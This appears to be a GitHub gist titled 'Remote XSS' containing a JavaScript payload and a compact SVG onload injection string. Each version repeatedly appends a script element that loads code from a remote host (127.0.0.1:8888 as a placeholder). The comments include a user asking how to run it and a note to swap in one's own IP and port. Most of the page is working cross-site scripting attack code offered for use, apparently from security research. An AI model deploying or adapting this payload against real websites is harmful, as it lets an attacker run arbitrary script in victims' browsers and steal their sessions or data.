Last active
August 23, 2018 15:23
-
-
Save bl4de/c797df109bec9bbe91b9 to your computer and use it in GitHub Desktop.
Remote XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // clean JavaScript payload | |
| // I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression) | |
| (function(){ | |
| var d=document,s; // create first <script> element | |
| s=d.createElement('script'); // and append it to body | |
| d.body.appendChild(s); | |
| setInterval(function(){ | |
| d.body.removeChild(s); // remove, then create again and get connection | |
| s=d.createElement('script'); | |
| d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888"; | |
| d.body.appendChild(s); | |
| },0); | |
| } | |
| )() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
| setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
Hi.. I have one query on IIFE way of running remote-XSS-javascript-part.js...
- How can i run this code.. I tried to run the code independently .. got an error of document is undefined...
Can you help me to run the code ?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Complete XSS payload:
You need to change s.src IP (or hostname) and TCP port to something what works for you
Element:
is created only one in the whole DOM.
Browser works little bit slower, but there's no new script element append in every setInterval() iteration.